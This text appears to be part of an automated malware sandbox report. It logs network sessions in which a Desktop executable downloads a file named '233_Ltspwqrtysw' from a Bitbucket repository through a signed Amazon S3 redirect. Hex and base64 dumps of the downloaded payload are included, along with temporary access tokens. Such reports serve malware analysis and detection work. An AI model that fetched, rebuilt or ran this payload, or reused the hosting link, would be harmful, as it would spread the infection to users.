                                                                                                                                        2024-10-23 05:02:12 UTC9592INData Raw: 46 61 59 39 5a 70 61 35 72 48 49 36 44 4b 44 53 50 70 4f 70 66 68 32 67 38 4d 6f 44 64 38 64 56 55 35 6a 59 4f 65 77 4b 35 68 64 4a 62 31 31 64 74 75 37 62 75 38 4f 74 62 52 6e 57 46 64 49 55 30 36 55 78 77 64 62 4b 73 46 62 79 48 42 66 57 6c 39 59 36 71 7a 37 37 55 4f 57 67 61 76 55 78 73 65 33 47 39 47 38 6b 79 50 4a 78 35 46 74 70 74 4c 31 55 6e 70 30 35 73 68 53 6b 59 69 48 30 31 6a 49 77 69 45 4c 62 38 62 50 33 37 47 55 44 62 6d 63 34 6f 71 4f 44 55 2f 47 58 71 67 77 51 47 33 4e 35 48 61 76 31 55 76 55 62 42 57 5a 68 61 4c 4c 37 66 38 70 54 57 52 61 67 61 79 2f 75 59 65 75 71 4c 51 61 68 7a 4a 5a 46 51 62 6d 43 63 49 67 43 78 35 74 46 34 4f 42 65 6c 50 67 70 62 32 51 73 62 56 6b 4c 47 6c 4c 48 79 44 64 56 4b 56 67 45 44 36 68 44 5a 39 71 63 47 51 50
                                                                                                                                        Data Ascii: FaY9Zpa5rHI6DKDSPpOpfh2g8MoDd8dVU5jYOewK5hdJb11dtu7bu8OtbRnWFdIU06UxwdbKsFbyHBfWl9Y6qz77UOWgavUxse3G9G8kyPJx5FtptL1Unp05shSkYiH01jIwiELb8bP37GUDbmc4oqODU/GXqgwQG3N5Hav1UvUbBWZhaLL7f8pTWRagay/uYeuqLQahzJZFQbmCcIgCx5tF4OBelPgpb2QsbVkLGlLHyDdVKVgED6hDZ9qcGQP
                                                                                                                                        2024-10-23 05:02:12 UTC16384INData Raw: 4f 4a 31 56 73 54 77 49 5a 66 44 77 45 39 74 74 38 73 69 4f 70 54 41 69 75 57 6f 66 76 69 45 79 6a 48 68 6f 4b 46 33 66 48 53 54 51 48 52 4e 77 4d 6d 51 31 57 63 6e 66 6f 46 78 70 42 73 2f 4e 67 43 33 59 63 65 35 4c 2b 53 77 61 45 6c 79 5a 56 46 73 64 55 4e 4f 6e 54 4a 6d 41 2f 73 2b 79 47 4d 37 47 48 51 37 45 31 37 55 41 48 66 35 7a 59 57 6f 66 4b 31 52 45 4b 30 69 61 2f 36 59 4a 52 4b 45 76 37 57 38 43 54 64 41 61 5a 6f 79 79 7a 31 65 45 4a 67 51 57 75 4e 6c 77 49 72 4c 78 36 2f 53 59 57 62 53 6e 68 73 4e 78 47 56 4b 7a 49 49 79 6b 56 33 4d 36 74 36 74 6f 51 73 39 55 68 67 6c 48 4e 58 68 62 75 66 6c 44 6c 56 39 46 36 72 42 4f 56 79 46 36 55 34 6e 43 69 65 35 76 45 2b 6c 49 63 4e 76 42 79 71 52 72 56 2b 37 50 36 30 76 69 71 68 61 71 58 6b 39 6d 55 56 64
                                                                                                                                        Data Ascii: OJ1VsTwIZfDwE9tt8siOpTAiuWofviEyjHhoKF3fHSTQHRNwMmQ1WcnfoFxpBs/NgC3Yce5L+SwaElyZVFsdUNOnTJmA/s+yGM7GHQ7E17UAHf5zYWofK1REK0ia/6YJRKEv7W8CTdAaZoyyz1eEJgQWuNlwIrLx6/SYWbSnhsNxGVKzIIykV3M6t6toQs9UhglHNXhbuflDlV9F6rBOVyF6U4nCie5vE+lIcNvByqRrV+7P60viqhaqXk9mUVd


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49703 | 185.166.143.48 | 443 | 6452 | C:\Users\user\Desktop\z10982283782.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-23 05:02:13 UTC | 187 | OUT | GET /akeem4u/canter/downloads/233_Ltspwqrtysw HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: bitbucket.org
2024-10-23 05:02:13 UTC | 5172 | IN | HTTP/1.1 302 Found
Date: Wed, 23 Oct 2024 05:02:13 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Server: AtlassianEdge
Location: https://bbuseruploads.s3.amazonaws.com/1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/a122b37b-2be1-4956-a228-3e44b96626b8/233_Ltspwqrtysw?response-content-disposition=attachment%3B%20filename%3D%22233_Ltspwqrtysw%22&AWSAccessKeyId=ASIA6KOSE3BNA3TNBD6S&Signature=bquajkbDUnHiY6Qk9cEyy3Ji0xM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEE0aCXVzLWVhc3QtMSJIMEYCIQDWLdnMpGGZVnfuf5mZ7tkLhGS%2BHN%2Fi5hrbwc5K5HeekAIhALFcc1ROzTR8B4kcaA2oVW3sq0zTC7bxDYRYDuyXyj6sKrACCLb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgyNe%2FRStUblqwXyTbkqhAK8BQ1NlXfF77BQxUe%2BLDGJ72hzvISSyyG1nPahXGTPb9H%2F4F2%2F5GlsBuXRyGcOQkj4ERRXbeHiahdKc%2BywbR6YEWoYOH14NAUuJivTj9fBN6WDk7UmQ8nnk5IxunnOohsVHIhsiRtMzjGYE3m%2BT3Nv%2B2LBuAC5kTgwrpgGcGd3z79%2FubqvQWKpCPk5OQo1tvOyZDdGiaMdoJrU%2F%2B%2F6PyCU39h28LMR4%2BdAAh6%2FYzNlkOlxzs7Ih0fOSFaTs1BSOSRuTvP9GixHrOn3THgqHyMm8F1oMbov2tlWw%2BCDNj5ns8S8xb%2BGRMfWJz69PjosPmJKRQvcpZYEVJ%2Fuao%2BBg6rxNrk1bzCkhuK4BjqcAeGCMiJnZekyMuhm2XJ%2FmPZHGuv1mMGkMdY36AKfCoyDFZlLRnUelBbsByQxcf9NuZCZIj5sRzg6N9aafMqZIWX [TRUNCATED]
Expires: Wed, 23 Oct 2024 05:02:13 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
X-Used-Mesh: False
Vary: Accept-Language, Origin
Content-Language: en
X-View-Name: bitbucket.apps.downloads.views.download_file
X-Dc-Location: Micros-3
X-Served-By: 4f033736e791
X-Version: 4bc3453affe5
X-Static-Version: 4bc3453affe5
X-Request-Count: 2297
X-Render-Time: 0.06429934501647949
X-B3-Traceid: 0700a870dcdf49dbac744012fc0f9af5
X-B3-Spanid: 019f1a6cf5ad8a60
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: object-src 'none'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; base-uri 'self'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.c [TRUNCATED]
X-Usage-Quota-Remaining: 998793.849
X-Usage-Request-Cost: 1061.50
X-Usage-User-Time: 0.028822
X-Usage-System-Time: 0.003023
X-Usage-Input-Ops: 0
X-Usage-Output-Ops: 0
Age: 0
X-Cache: MISS
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Atl-Traceid: 0700a870dcdf49dbac744012fc0f9af5
Atl-Request-Id: 0700a870-dcdf-49db-ac74-4012fc0f9af5
Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
Server-Timing: atl-edge;dur=172,atl-edge-internal;dur=3,atl-edge-upstream;dur=171,atl-edge-pop;desc="aws-eu-central-1"
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49704 | 3.5.3.65 | 443 | 6452 | C:\Users\user\Desktop\z10982283782.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-23 05:02:14 UTC | 1295 | OUT | GET /1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/a122b37b-2be1-4956-a228-3e44b96626b8/233_Ltspwqrtysw?response-content-disposition=attachment%3B%20filename%3D%22233_Ltspwqrtysw%22&AWSAccessKeyId=ASIA6KOSE3BNA3TNBD6S&Signature=bquajkbDUnHiY6Qk9cEyy3Ji0xM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEE0aCXVzLWVhc3QtMSJIMEYCIQDWLdnMpGGZVnfuf5mZ7tkLhGS%2BHN%2Fi5hrbwc5K5HeekAIhALFcc1ROzTR8B4kcaA2oVW3sq0zTC7bxDYRYDuyXyj6sKrACCLb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgyNe%2FRStUblqwXyTbkqhAK8BQ1NlXfF77BQxUe%2BLDGJ72hzvISSyyG1nPahXGTPb9H%2F4F2%2F5GlsBuXRyGcOQkj4ERRXbeHiahdKc%2BywbR6YEWoYOH14NAUuJivTj9fBN6WDk7UmQ8nnk5IxunnOohsVHIhsiRtMzjGYE3m%2BT3Nv%2B2LBuAC5kTgwrpgGcGd3z79%2FubqvQWKpCPk5OQo1tvOyZDdGiaMdoJrU%2F%2B%2F6PyCU39h28LMR4%2BdAAh6%2FYzNlkOlxzs7Ih0fOSFaTs1BSOSRuTvP9GixHrOn3THgqHyMm8F1oMbov2tlWw%2BCDNj5ns8S8xb%2BGRMfWJz69PjosPmJKRQvcpZYEVJ%2Fuao%2BBg6rxNrk1bzCkhuK4BjqcAeGCMiJnZekyMuhm2XJ%2FmPZHGuv1mMGkMdY36AKfCoyDFZlLRnUelBbsByQxcf9NuZCZIj5sRzg6N9aafMqZIWX0TejNIhed6dqnVS8HwylTQKvAyrfpMWEXQYcoRuCgC5H [TRUNCATED]
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: bbuseruploads.s3.amazonaws.com
2024-10-23 05:02:14 UTC | 564 | IN | HTTP/1.1 200 OK
x-amz-id-2: 86MRn3m5Urr/RDXKUByU2cfXY2nnTidpB7JTF3JMf0hHoa++wXSZbCraTac+jhgSvs/Ln+WKKpVYQ024mKMJj6px95wtm+7j
x-amz-request-id: 6P0F7V9G37K7A9B1
Date: Wed, 23 Oct 2024 05:02:15 GMT
Last-Modified: Tue, 22 Oct 2024 05:16:04 GMT
ETag: "5d7ab335987101c49bbbe6ebcea19843"
x-amz-server-side-encryption: AES256
x-amz-version-id: aV2sZzfG3ESjVStuXavykQrQq1UCdUQQ
Content-Disposition: attachment; filename="233_Ltspwqrtysw"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Server: AmazonS3
Content-Length: 383200
Connection: close
                                                                                                                                        2024-10-23 05:02:14 UTC1393INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 52 47 41 34 57 47 79 55 65 46 78 55 58 46 53 55 53 4a 42 77 69 47 79 49 53 4a 69 4d 50 4a 79 63 52 46 52 4d 52 48 69 51 6a 47 68 55 57 49 51 38 5a 4a 52 51 52 49 78 45 65 47 68 77 6c 47 68 55 59 47 52 51 56 70 71 36 6c 57 53 4f 6e 73 55 74 58 49 53 41 64 4a 42 34 66 49 53 59 67 4a 4b 61 75 70 56 6b 6a 70 37 46 4c 61 46 39 6c 58 57 4a 73 64 56 35 63 58 6c 78 73 61 58 74 6a 65 57 4a 35 61 57 31 36 5a 6d 35 75 61 46 78 71 61 48 56 37 65 6d 46 63 58 58 68 6d 59 47 78 72 61 48 70 6f 64 57 46 6a 62 47 46 63 58 32 42 72 58 47 68 66 5a 56 31 69 62 48 56 65 58 46 35 63 62 47 6c 37 59 33 6c 69 65 57 6c 74 65 6d 5a 75 62 6d 68 63 61 6d 68 31 65 33 70 68 58 46 31 34 5a 6d 42 73 61 32 68 36 61 48 56 68 59 32 78 68 58 46 39 67 61 31 78
                                                                                                                                        Data Ascii: pq6lWSOnsUsRGA4WGyUeFxUXFSUSJBwiGyISJiMPJycRFRMRHiQjGhUWIQ8ZJRQRIxEeGhwlGhUYGRQVpq6lWSOnsUtXISAdJB4fISYgJKaupVkjp7FLaF9lXWJsdV5cXlxsaXtjeWJ5aW16Zm5uaFxqaHV7emFcXXhmYGxraHpodWFjbGFcX2BrXGhfZV1ibHVeXF5cbGl7Y3lieWltemZubmhcamh1e3phXF14ZmBsa2h6aHVhY2xhXF9ga1x
                                                                                                                                        2024-10-23 05:02:14 UTC16384INData Raw: 77 31 30 30 46 6d 6a 46 47 43 30 30 57 63 5a 79 71 6c 36 56 56 75 62 42 41 56 4a 30 68 74 70 64 7a 50 32 75 67 4d 65 51 71 69 71 44 74 41 57 78 52 73 65 57 41 4b 39 42 6e 66 50 4e 2f 63 67 53 41 64 6d 32 35 6d 51 37 70 35 37 59 2f 43 44 6b 4e 2b 4b 58 36 41 53 76 45 68 35 72 67 72 6b 62 79 67 6d 48 5a 34 63 45 53 68 37 47 66 62 76 35 31 63 48 38 41 70 62 39 5a 68 47 71 66 71 38 73 70 61 46 4c 6a 71 59 72 5a 55 50 41 74 66 74 4e 44 74 49 75 67 65 6a 30 79 73 77 38 6e 75 51 6d 59 43 6a 61 6b 6c 51 59 55 42 6c 59 6c 68 32 32 5a 68 36 70 77 4f 6d 56 32 4c 68 69 4d 38 35 7a 72 6a 4a 31 53 58 62 6a 67 56 48 4f 31 4a 36 51 4b 4f 55 4e 2f 54 7a 6e 79 73 4d 4c 61 6a 45 72 37 71 47 41 39 56 71 7a 46 75 58 76 7a 2b 50 63 67 78 63 4e 65 58 53 65 59 4f 53 72 63 78 77
                                                                                                                                        Data Ascii: w100FmjFGC00WcZyql6VVubBAVJ0htpdzP2ugMeQqiqDtAWxRseWAK9BnfPN/cgSAdm25mQ7p57Y/CDkN+KX6ASvEh5rgrkbygmHZ4cESh7Gfbv51cH8Apb9ZhGqfq8spaFLjqYrZUPAtftNDtIugej0ysw8nuQmYCjaklQYUBlYlh22Zh6pwOmV2LhiM85zrjJ1SXbjgVHO1J6QKOUN/TznysMLajEr7qGA9VqzFuXvz+PcgxcNeXSeYOSrcxw
                                                                                                                                        2024-10-23 05:02:14 UTC1024INData Raw: 6a 2b 56 6d 63 4b 37 72 70 64 50 63 69 32 7a 41 55 4e 49 78 74 51 69 69 38 79 44 69 2b 6d 61 74 55 37 42 73 5a 61 4a 4b 61 51 57 2b 2b 32 48 5a 41 49 30 61 31 65 56 56 77 4b 63 4c 75 7a 4b 67 6e 37 55 57 65 78 6d 5a 75 77 36 31 73 73 64 30 54 45 58 49 62 42 2b 34 56 4e 42 31 63 77 48 6d 66 30 44 4a 6f 53 33 6f 4e 4c 77 4d 36 6f 6e 71 61 75 59 6d 62 76 65 44 36 64 64 50 69 36 69 61 68 43 59 68 79 65 39 4b 64 56 78 61 42 50 43 78 6c 35 6f 61 42 39 4c 4f 73 37 43 66 59 65 34 62 79 6f 37 43 47 66 6b 76 47 75 79 30 4f 34 4c 6e 70 4a 6d 52 78 4a 59 4b 79 63 63 56 39 62 69 72 50 55 38 51 67 49 57 57 4c 6c 49 6e 65 44 30 69 74 59 50 34 4c 59 33 4c 4f 59 2b 72 64 2f 51 63 73 72 34 4b 37 6a 6d 44 74 57 35 37 75 68 74 45 62 58 30 30 41 38 77 35 30 76 6c 64 6b 4d 31
                                                                                                                                        Data Ascii: j+VmcK7rpdPci2zAUNIxtQii8yDi+matU7BsZaJKaQW++2HZAI0a1eVVwKcLuzKgn7UWexmZuw61ssd0TEXIbB+4VNB1cwHmf0DJoS3oNLwM6onqauYmbveD6ddPi6iahCYhye9KdVxaBPCxl5oaB9LOs7CfYe4byo7CGfkvGuy0O4LnpJmRxJYKyccV9birPU8QgIWWLlIneD0itYP4LY3LOY+rd/Qcsr4K7jmDtW57uhtEbX00A8w50vldkM1
                                                                                                                                        2024-10-23 05:02:14 UTC16384INData Raw: 43 71 32 56 4f 6d 2b 37 4a 4c 4a 71 32 64 2b 53 73 45 37 63 65 65 79 61 6a 30 57 68 6e 72 70 6b 42 44 4a 56 4d 70 37 34 4c 52 36 6f 63 73 4c 7a 7a 61 50 35 31 54 6e 74 4c 6e 46 76 32 2f 4a 36 4c 39 54 45 59 4f 4c 4e 43 64 54 64 7a 7a 66 50 50 4e 6a 58 51 4e 64 33 69 69 43 4e 43 6b 62 73 4f 50 36 77 42 31 57 45 55 75 36 61 67 36 31 57 31 4c 52 50 6b 35 53 34 37 57 47 6d 51 66 4f 63 62 52 76 30 58 42 36 4e 52 57 68 72 52 69 32 78 61 30 4a 69 66 6e 6e 6b 75 6e 58 6b 41 59 52 4e 71 73 61 4d 6e 4c 36 57 46 51 37 70 38 37 32 46 61 69 50 50 48 61 62 4f 74 79 71 30 69 79 67 54 44 56 66 41 41 63 51 4f 45 66 75 47 72 46 54 31 75 4c 32 76 5a 59 73 31 42 63 39 45 61 70 70 4e 6d 36 66 39 37 52 6a 43 35 54 48 72 53 30 72 70 6e 75 4e 74 6d 69 65 64 47 2f 6d 35 6b 6f 70
                                                                                                                                        Data Ascii: Cq2VOm+7JLJq2d+SsE7ceeyaj0WhnrpkBDJVMp74LR6ocsLzzaP51TntLnFv2/J6L9TEYOLNCdTdzzfPPNjXQNd3iiCNCkbsOP6wB1WEUu6ag61W1LRPk5S47WGmQfOcbRv0XB6NRWhrRi2xa0JifnnkunXkAYRNqsaMnL6WFQ7p872FaiPPHabOtyq0iygTDVfAAcQOEfuGrFT1uL2vZYs1Bc9EappNm6f97RjC5THrS0rpnuNtmiedG/m5kop
                                                                                                                                        2024-10-23 05:02:14 UTC1024INData Raw: 54 58 78 70 46 43 37 43 33 64 35 47 30 6c 63 63 61 6e 76 46 37 71 47 54 75 5a 38 6c 62 39 31 7a 6c 62 57 73 7a 39 2b 78 61 46 62 35 41 57 6c 37 6d 59 37 4a 67 63 71 4e 63 73 47 42 54 43 50 6c 61 65 42 36 36 2b 65 46 78 4a 74 32 39 6b 6a 61 6c 49 49 6c 75 65 67 74 72 67 38 4c 79 68 51 74 72 38 69 71 46 64 56 4c 65 6e 53 68 37 37 35 5a 64 46 47 49 4e 36 78 58 63 4e 42 6e 72 72 6d 65 64 6a 76 53 58 4f 71 31 57 7a 76 5a 41 31 71 6c 4a 31 5a 2f 59 72 62 2b 52 2f 64 6d 4d 79 43 51 64 33 75 48 34 69 6b 56 63 6d 67 44 55 68 4d 6c 2b 46 58 41 34 2b 78 53 56 6a 4f 63 57 4d 45 50 33 6d 70 67 31 4f 31 61 72 2f 30 49 4a 44 6f 43 33 64 43 41 31 55 55 64 7a 45 52 31 6c 37 4a 4f 54 7a 32 38 39 5a 76 42 53 71 76 67 68 69 5a 32 6a 34 6e 65 68 62 66 49 41 64 43 61 58 59 73
                                                                                                                                        Data Ascii: TXxpFC7C3d5G0lccanvF7qGTuZ8lb91zlbWsz9+xaFb5AWl7mY7JgcqNcsGBTCPlaeB66+eFxJt29kjalIIluegtrg8LyhQtr8iqFdVLenSh775ZdFGIN6xXcNBnrrmedjvSXOq1WzvZA1qlJ1Z/Yrb+R/dmMyCQd3uH4ikVcmgDUhMl+FXA4+xSVjOcWMEP3mpg1O1ar/0IJDoC3dCA1UUdzER1l7JOTz289ZvBSqvghiZ2j4nehbfIAdCaXYs
                                                                                                                                        2024-10-23 05:02:14 UTC16384INData Raw: 74 32 43 4a 51 54 4c 33 76 5a 42 71 52 71 45 6f 6a 31 54 44 63 4f 56 70 6d 41 72 77 47 6e 63 64 66 67 73 59 4c 42 47 49 4a 54 55 77 53 2f 62 2f 63 58 46 2f 51 6e 53 50 4a 31 42 43 76 35 62 57 4e 72 39 38 59 70 30 42 76 50 75 7a 6f 53 55 44 50 73 68 77 73 61 33 4e 6c 48 6f 62 38 38 73 4f 7a 77 4f 6f 79 43 2f 69 69 65 66 79 6e 48 56 72 54 74 41 6d 6d 34 39 5a 54 49 30 7a 77 46 73 6b 45 38 6a 37 6d 2b 6e 57 53 74 52 4f 68 4e 63 55 52 32 33 49 6d 6a 33 4d 41 39 54 32 78 69 7a 2f 48 34 6d 4b 2f 44 71 66 74 7a 67 2b 73 77 4d 70 79 50 79 39 78 47 79 44 64 5a 6e 55 4a 37 51 38 67 47 79 6a 51 65 7a 55 62 65 53 5a 7a 30 68 42 64 52 73 4c 75 62 61 31 44 75 51 56 37 51 79 4c 61 31 63 78 56 46 74 57 43 58 69 79 73 69 47 65 74 32 6b 7a 41 34 4c 6b 6e 5a 50 54 43 45 31
                                                                                                                                        Data Ascii: t2CJQTL3vZBqRqEoj1TDcOVpmArwGncdfgsYLBGIJTUwS/b/cXF/QnSPJ1BCv5bWNr98Yp0BvPuzoSUDPshwsa3NlHob88sOzwOoyC/iiefynHVrTtAmm49ZTI0zwFskE8j7m+nWStROhNcUR23Imj3MA9T2xiz/H4mK/Dqftzg+swMpyPy9xGyDdZnUJ7Q8gGyjQezUbeSZz0hBdRsLuba1DuQV7QyLa1cxVFtWCXiysiGet2kzA4LknZPTCE1
                                                                                                                                        2024-10-23 05:02:14 UTC1024INData Raw: 2b 52 48 32 6d 39 79 30 2f 50 31 57 58 54 6a 63 35 49 53 7a 52 43 37 50 66 54 6d 72 39 75 58 6d 66 72 5a 31 73 55 7a 50 4d 62 36 49 72 78 72 4a 55 38 7a 57 6b 49 64 57 73 41 59 57 74 34 6e 73 55 69 69 50 4e 4a 74 41 70 36 7a 78 51 4f 32 72 6e 72 42 65 4b 78 70 72 54 69 74 37 31 7a 49 71 50 50 31 72 33 4a 70 42 78 51 62 71 65 50 65 42 49 32 63 75 76 2b 67 77 51 64 39 2f 4b 53 2b 37 49 6b 2b 74 63 38 67 77 70 4d 58 35 4c 58 72 6c 7a 2b 6d 73 42 2f 42 51 36 39 59 72 66 54 45 47 31 76 65 47 6c 36 5a 78 46 6b 30 6d 36 6c 2f 50 39 77 51 52 42 52 6c 76 72 75 46 41 59 33 31 73 36 76 58 32 4f 71 36 4a 78 44 58 30 4c 49 41 43 77 73 78 31 71 71 4d 53 47 75 54 77 49 56 2b 38 42 4f 6b 42 66 64 69 71 71 64 62 43 4c 6d 50 4f 67 71 70 4f 41 56 77 73 76 4c 49 44 64 42 69
                                                                                                                                        Data Ascii: +RH2m9y0/P1WXTjc5ISzRC7PfTmr9uXmfrZ1sUzPMb6IrxrJU8zWkIdWsAYWt4nsUiiPNJtAp6zxQO2rnrBeKxprTit71zIqPP1r3JpBxQbqePeBI2cuv+gwQd9/KS+7Ik+tc8gwpMX5LXrlz+msB/BQ69YrfTEG1veGl6ZxFk0m6l/P9wQRBRlvruFAY31s6vX2Oq6JxDX0LIACwsx1qqMSGuTwIV+8BOkBfdiqqdbCLmPOgqpOAVwsvLIDdBi
                                                                                                                                        2024-10-23 05:02:14 UTC16384INData Raw: 43 6e 5a 56 70 69 74 54 69 61 39 47 30 69 31 49 51 78 51 46 62 51 62 6e 66 64 6f 55 54 66 2b 6c 72 58 70 39 49 53 51 78 75 67 58 78 70 6c 42 6f 39 2b 61 4a 75 65 48 4b 6e 2f 56 34 51 4b 41 66 71 68 53 61 35 6c 58 43 65 63 49 71 4b 65 73 4b 31 57 34 45 2f 34 58 78 45 78 2f 4d 6d 71 43 71 74 75 77 6b 63 6d 55 71 38 73 7a 72 43 47 49 39 68 45 4a 59 30 57 57 72 35 67 6a 51 4d 76 6d 44 59 74 41 77 39 6b 66 4d 46 38 79 36 33 4d 35 69 33 6d 6f 38 33 36 4c 51 56 32 44 2f 4b 45 34 76 70 4d 70 67 5a 69 77 36 43 44 69 76 38 2f 67 37 6b 7a 6d 30 6a 64 45 46 71 34 53 70 63 56 47 35 63 74 48 52 75 63 56 56 59 64 4f 49 32 54 4a 43 67 74 35 38 2b 7a 35 58 52 53 35 44 57 44 6f 46 6b 65 55 4d 77 57 6a 75 4f 70 36 62 2f 4d 78 76 34 38 6b 65 70 72 64 35 70 6a 6e 73 46 31 34
                                                                                                                                        Data Ascii: CnZVpitTia9G0i1IQxQFbQbnfdoUTf+lrXp9ISQxugXxplBo9+aJueHKn/V4QKAfqhSa5lXCecIqKesK1W4E/4XxEx/MmqCqtuwkcmUq8szrCGI9hEJY0WWr5gjQMvmDYtAw9kfMF8y63M5i3mo836LQV2D/KE4vpMpgZiw6CDiv8/g7kzm0jdEFq4SpcVG5ctHRucVVYdOI2TJCgt58+z5XRS5DWDoFkeUMwWjuOp6b/Mxv48keprd5pjnsF14
                                                                                                                                        2024-10-23 05:02:14 UTC1024INData Raw: 54 70 61 51 79 4b 68 5a 35 4b 58 4c 50 74 4d 76 42 67 46 6a 45 52 52 38 33 56 70 38 45 32 35 32 4c 4b 65 66 51 46 2f 38 31 50 4b 42 50 56 49 76 76 64 70 55 2b 35 72 2b 39 56 57 42 49 72 77 44 63 62 31 62 58 65 69 33 33 67 42 79 68 73 4f 59 30 6f 4d 67 4c 4f 75 46 41 47 54 64 54 42 45 6e 71 5a 49 6f 65 6d 30 39 32 48 75 4b 74 41 32 72 34 4b 50 68 6b 6e 2b 6c 53 53 44 59 62 34 78 6c 35 72 6b 32 69 66 4f 5a 56 57 53 64 47 78 6d 6c 42 6f 77 38 55 44 63 44 53 35 31 77 44 41 37 36 65 54 65 4d 55 53 2f 6f 34 32 49 7a 5a 44 6c 46 7a 6d 49 46 65 4e 2b 79 75 70 68 68 37 74 42 4e 31 55 69 45 4b 56 6a 39 4b 4e 43 31 4c 6f 68 32 42 6b 62 61 74 4d 42 47 5a 4a 47 51 2b 4c 45 38 79 35 53 55 45 42 39 41 50 56 4c 49 38 37 42 32 71 61 6b 2f 2b 43 32 37 73 52 75 65 52 47 33
                                                                                                                                        Data Ascii: TpaQyKhZ5KXLPtMvBgFjERR83Vp8E252LKefQF/81PKBPVIvvdpU+5r+9VWBIrwDcb1bXei33gByhsOY0oMgLOuFAGTdTBEnqZIoem092HuKtA2r4KPhkn+lSSDYb4xl5rk2ifOZVWSdGxmlBow8UDcDS51wDA76eTeMUS/o42IzZDlFzmIFeN+yuphh7tBN1UiEKVj9KNC1Loh2BkbatMBGZJGQ+LE8y5SUEB9APVLI87B2qak/+C27sRueRG3
                                                                                                                                        2024-10-23 05:02:14 UTC16384INData Raw: 5a 53 4e 64 57 64 62 62 73 2f 74 41 62 52 68 2b 6c 42 56 6a 36 6b 47 47 7a 45 65 4c 6c 6e 71 4e 42 56 48 4e 42 69 58 65 70 44 43 52 4e 57 48 73 79 44 51 64 36 55 47 64 6c 34 63 55 76 51 54 41 4e 57 42 46 42 63 67 33 59 4f 72 41 48 44 38 66 47 65 32 44 36 59 32 49 39 34 6a 52 6c 32 6f 42 64 59 6f 33 6a 7a 37 4e 79 39 75 6f 6c 36 4d 31 56 4a 77 6a 61 45 43 52 4b 46 43 46 52 6d 51 56 47 35 64 32 48 44 59 4e 6a 30 70 4d 6b 58 64 41 69 76 4b 37 71 64 6a 42 37 62 38 71 65 41 2f 50 44 41 36 41 51 61 5a 49 70 44 4d 6f 4b 68 33 79 2f 57 6a 2b 4d 36 7a 56 32 77 66 46 46 69 4e 77 56 49 56 71 61 53 4c 54 61 54 72 50 79 2f 4a 38 76 6f 66 4f 63 55 56 30 63 65 4e 7a 39 54 77 71 52 6c 55 68 44 2b 59 75 74 75 7a 43 6a 72 6a 7a 55 30 44 58 37 74 65 53 49 4d 52 57 76 33 74
                                                                                                                                        Data Ascii: ZSNdWdbbs/tAbRh+lBVj6kGGzEeLlnqNBVHNBiXepDCRNWHsyDQd6UGdl4cUvQTANWBFBcg3YOrAHD8fGe2D6Y2I94jRl2oBdYo3jz7Ny9uol6M1VJwjaECRKFCFRmQVG5d2HDYNj0pMkXdAivK7qdjB7b8qeA/PDA6AQaZIpDMoKh3y/Wj+M6zV2wfFFiNwVIVqaSLTaTrPy/J8vofOcUV0ceNz9TwqRlUhD+YutuzCjrjzU0DX7teSIMRWv3t


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
4          | 192.168.2.7 | 49707       | 185.166.143.48 | 443              | 6452 | C:\Users\user\Desktop\z10982283782.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-23 05:02:16 UTC | 187 | OUT | GET /akeem4u/canter/downloads/233_Ltspwqrtysw HTTP/1.1
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Accept: */*
                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                        Host: bitbucket.org
2024-10-23 05:02:16 UTC | 5172 | IN | HTTP/1.1 302 Found
                                                                                                                                        Date: Wed, 23 Oct 2024 05:02:16 GMT
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Content-Length: 0
                                                                                                                                        Server: AtlassianEdge
